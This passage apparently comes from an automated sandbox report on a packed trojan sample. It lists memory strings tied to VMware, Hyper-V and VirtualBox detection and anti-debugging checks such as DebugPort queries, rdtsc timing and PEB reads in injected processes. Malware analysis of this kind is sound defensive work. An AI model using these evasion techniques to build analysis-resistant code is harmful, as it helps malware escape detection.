Source: explorer.exe, 00000010.00000003.902621050.000000000F492000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000010.00000003.905324815.000000000EEB2000.00000004.00000001.sdmp Binary or memory string: }#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware horizon client
Source: SearchUI.exe, 00000016.00000003.843512340.000001B8E45F7000.00000004.00000001.sdmp Binary or memory string: *|hyper-v manager*|hyper v4225
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmware svga
Source: explorer.exe, 00000010.00000003.902544793.00000000063F7000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B5b
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}`
Source: explorer.exe, 00000010.00000003.902602832.000000000F48D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bm
Source: explorer.exe, 00000010.00000003.903702476.000000000EEB1000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}`p.
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware workstation 12 player
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: explorer.exe, 00000010.00000003.901951610.0000000006454000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.Horizon.Client9116
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: virtual-vmware pointing device
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000!O
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.Workstation.vmui7347
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware vsphere clientator x
Source: explorer.exe, 00000002.00000000.704041361.000000000A716000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&^
Source: explorer.exe, 00000010.00000003.836052474.0000000006300000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware Workstation\vmnetcfg.exe11073
Source: SearchUI.exe, 00000016.00000003.854498121.000001B8E47E8000.00000004.00000001.sdmp Binary or memory string: vmware vsphere client
Source: explorer.exe, 00000002.00000000.700277860.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.Workstation.vmplayer7859
Source: explorer.exe, 00000010.00000002.1046776940.000000000626D000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000010.00000003.882389201.000000000F59B000.00000004.00000001.sdmp Binary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 00000010.00000002.1047169993.000000000637F000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD004rFw
Source: SearchUI.exe, 00000016.00000002.899122155.000001B0CF010000.00000004.00000001.sdmp Binary or memory string: *|hyper-v manager*|hyperv3631
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.687067868.0000000005620000.00000004.00000001.sdmp Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: SearchUI.exe, 00000016.00000003.843512340.000001B8E45F7000.00000004.00000001.sdmp Binary or memory string: nh*|cmd112220*|disk cleanup*|cleanmgr.exe77726*|excel 2013*|microsoft office7310App12227*|default programs*|defult598712233*|defragment and optimize drives*|degrag6248*|file explorer*|window explorer70312378*|geforce experience*|shadowplay56352391*|geforce experience*|gforce652112409*|geforce experience*|nivi6501bwe!App12348*|get started*|windows 10 help3344*|google cloud sdk shell*|cmd1*|google drive*|googledrive6212App12414*|groove music*|open music71364!App12331*|groove music*|play music4514e12415*|hi-rez diagnostics and support*|hi rez2380*|file explorer*|where are my files6187*|file explorer*|windows explorer3803*|geforce experience*|nvide6593p12374*|get started*|windows help3912a!App12368*|hp aio printer remote*|hp printer273812342*|get started*|windows 10 tutorial451012372*|file explorer*|open file explorer710477*|geforce experience*|nvidia ge617112332*|geforce experience*|nvida644587*|global vpn client*|sonicwall423112398*|football manager 2015*|fm964App12322*|games for windows marketplace*|gfwl3576*|google earth*|googleearth640712395*|google play music*|google music2700e12346*|groove music*|play my music5618*|hi-rez diagnostics and support*|hirez1973*|geforce experience*|nvidia ex642612355*|file explorer*|file manager542312375*|groove music*|free music6921!App12337*|groove music*|xbox music67613*|free download manager*|fdm1938el12405*|geforce experience*|gefore5441p12329*|internet explorer*|explorer 11977912490*|intel(r) extreme tuning utility*|xtu1622*|internet explorer*|microsoft explorer8574*|internet download accelerator*|ida356*|internet explorer*|internet exploerer9667*|hyper-v manager*|hyper v4225e12505*|i.r.i.s. ocr registration*|iris12651*|idle (python gui)*|python idle4801*|image composite editor*|ice215App12525*|idle (python 3.5 32-bit)*|python idle50580*|internet download manager*|id,6987p12467*|internet explorer*|internet expolorer10417*|internet explorer*|internet exploreer9110*|internet explorer*|enternet explorer9276*|hp support assistant*|hps4890App12509*|internet download manager*|idman6644*|internet explorer*|interent explorer10096*|hp support assistant*|hp ass4255pp12449*|internet explorer*|internet explorere7950*|internet explorer*|internetexplorer8330524*|internet explorer*|inernet explorer985438*|internet explorer*|internet exlorer10013*|internet explorer*|intenet explorer9908421*|internet explorer*|internet eplorer9958*|internet explorer*|iexplorer.exe9535*|internet explorer*|internet explorer 117905*|internet explorer*|internet exploror10409*|internet explorer*|internet exporer8991*|internet explorer*|iexplore.exe7898*|internet explorer*|web browser10137*|internet explorer*|internet exployer853455*|internet explorer*|internet browser10356Microsoft.WindowsScan_8wekyb3d8bbwe!AppMicrosoft.Windows.Photos_8wekyb3d8bbwe!AppMicrosoft.MinecraftUWP_8wekyb3d8bbwe!
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.686708823.0000000004B70000.00000002.00000001.sdmp, explorer.exe, 00000002.00000002.764657677.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000A.00000002.765137858.000001EDC74E0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMwareInc.VMwareViewClient_23chmsjxv380w!App11470
Source: SearchUI.exe, 00000016.00000003.841016944.000001B8E4466000.00000004.00000001.sdmp Binary or memory string: VMware.View.Client10660
Source: explorer.exe, 00000010.00000003.906450432.000000000EEB0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BE*
Source: explorer.exe, 00000010.00000003.906450432.000000000EEB0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZZ[
Source: explorer.exe, 00000010.00000002.1046384297.0000000006136000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000010.00000003.782247022.0000000004CBD000.00000004.00000001.sdmp Binary or memory string: 0ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0040ACD0 LdrLoadDll, 1_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov eax, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D4120 mov ecx, dword ptr fs:[00000030h] 1_2_012D4120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E513A mov eax, dword ptr fs:[00000030h] 1_2_012E513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B9100 mov eax, dword ptr fs:[00000030h] 1_2_012B9100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BC962 mov eax, dword ptr fs:[00000030h] 1_2_012BC962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB171 mov eax, dword ptr fs:[00000030h] 1_2_012BB171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB944 mov eax, dword ptr fs:[00000030h] 1_2_012DB944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013351BE mov eax, dword ptr fs:[00000030h] 1_2_013351BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E61A0 mov eax, dword ptr fs:[00000030h] 1_2_012E61A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov ecx, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D99BF mov eax, dword ptr fs:[00000030h] 1_2_012D99BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013749A4 mov eax, dword ptr fs:[00000030h] 1_2_013749A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013369A6 mov eax, dword ptr fs:[00000030h] 1_2_013369A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EA185 mov eax, dword ptr fs:[00000030h] 1_2_012EA185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DC182 mov eax, dword ptr fs:[00000030h] 1_2_012DC182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E2990 mov eax, dword ptr fs:[00000030h] 1_2_012E2990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4190 mov eax, dword ptr fs:[00000030h] 1_2_012E4190
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BB1E1 mov eax, dword ptr fs:[00000030h] 1_2_012BB1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013441E8 mov eax, dword ptr fs:[00000030h] 1_2_013441E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E002D mov eax, dword ptr fs:[00000030h] 1_2_012E002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012CB02A mov eax, dword ptr fs:[00000030h] 1_2_012CB02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA830 mov eax, dword ptr fs:[00000030h] 1_2_012DA830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01337016 mov eax, dword ptr fs:[00000030h] 1_2_01337016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01384015 mov eax, dword ptr fs:[00000030h] 1_2_01384015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01372073 mov eax, dword ptr fs:[00000030h] 1_2_01372073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01381074 mov eax, dword ptr fs:[00000030h] 1_2_01381074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012D0050 mov eax, dword ptr fs:[00000030h] 1_2_012D0050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F90AF mov eax, dword ptr fs:[00000030h] 1_2_012F90AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E20A0 mov eax, dword ptr fs:[00000030h] 1_2_012E20A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EF0BF mov ecx, dword ptr fs:[00000030h] 1_2_012EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EF0BF mov eax, dword ptr fs:[00000030h] 1_2_012EF0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B9080 mov eax, dword ptr fs:[00000030h] 1_2_012B9080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01333884 mov eax, dword ptr fs:[00000030h] 1_2_01333884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B58EC mov eax, dword ptr fs:[00000030h] 1_2_012B58EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DB8E4 mov eax, dword ptr fs:[00000030h] 1_2_012DB8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012B40E1 mov eax, dword ptr fs:[00000030h] 1_2_012B40E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0134B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0134B8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DA309 mov eax, dword ptr fs:[00000030h] 1_2_012DA309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137131B mov eax, dword ptr fs:[00000030h] 1_2_0137131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BDB60 mov ecx, dword ptr fs:[00000030h] 1_2_012BDB60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E3B7A mov eax, dword ptr fs:[00000030h] 1_2_012E3B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E3B7A mov eax, dword ptr fs:[00000030h] 1_2_012E3B7A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01388B58 mov eax, dword ptr fs:[00000030h] 1_2_01388B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BDB40 mov eax, dword ptr fs:[00000030h] 1_2_012BDB40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012BF358 mov eax, dword ptr fs:[00000030h] 1_2_012BF358
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h] 1_2_012E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h] 1_2_012E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E4BAD mov eax, dword ptr fs:[00000030h] 1_2_012E4BAD
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_01385BA5 mov eax, dword ptr fs:[00000030h] 1_2_01385BA5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C1B8F mov eax, dword ptr fs:[00000030h] 1_2_012C1B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012C1B8F mov eax, dword ptr fs:[00000030h] 1_2_012C1B8F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B mov eax, dword ptr fs:[00000030h] 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B mov eax, dword ptr fs:[00000030h] 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E138B mov eax, dword ptr fs:[00000030h] 1_2_012E138B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0136D380 mov ecx, dword ptr fs:[00000030h] 1_2_0136D380
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DEB9A mov eax, dword ptr fs:[00000030h] 1_2_012DEB9A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DEB9A mov eax, dword ptr fs:[00000030h] 1_2_012DEB9A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E2397 mov eax, dword ptr fs:[00000030h] 1_2_012E2397
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_0137138A mov eax, dword ptr fs:[00000030h] 1_2_0137138A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012EB390 mov eax, dword ptr fs:[00000030h] 1_2_012EB390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012DDBE9 mov eax, dword ptr fs:[00000030h] 1_2_012DDBE9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012E03E2 mov eax, dword ptr fs:[00000030h] 1_2_012E03E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 mov ecx, dword ptr fs:[00000030h] 1_2_013623E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 mov ecx, dword ptr fs:[00000030h] 1_2_013623E3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_013623E3 mov eax, dword ptr fs:[00000030h] 1_2_013623E3
